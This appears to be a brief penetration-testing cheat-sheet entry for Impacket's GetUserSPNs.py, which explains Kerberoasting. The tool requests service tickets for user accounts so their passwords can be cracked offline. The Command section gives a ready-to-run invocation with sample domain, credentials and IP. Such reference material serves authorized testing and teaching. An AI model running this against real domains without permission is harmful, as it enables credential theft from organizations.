.. / Impacket-GetUserSPNs
Star

Impacket’s GetUserSPNs.py will attempt to fetch Service Principal Names that are associated with normal user accounts. What is returned is a ticket that is encrypted with the user account’s password, which can then be bruteforced offline.

Command Reference:

Target IP: 10.10.10.1

Domain: test.local

Username: john

Password: password123

Command:

python3 GetUserSPNs.py test.local/john:password123 -dc-ip 10.10.10.1 -request

References:

https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py

https://www.tarlogic.com/en/blog/how-to-attack-kerberos/

.. / Impacket-GetUserSPNs Star if(localStorage["style"]=="true"){ document.getElementById('pagestyle').setAttribute('href','/assets/styleDark.css'); document.querySelector('input[type="checkbox"]').checked = true }

.. / Impacket-GetUserSPNs
Star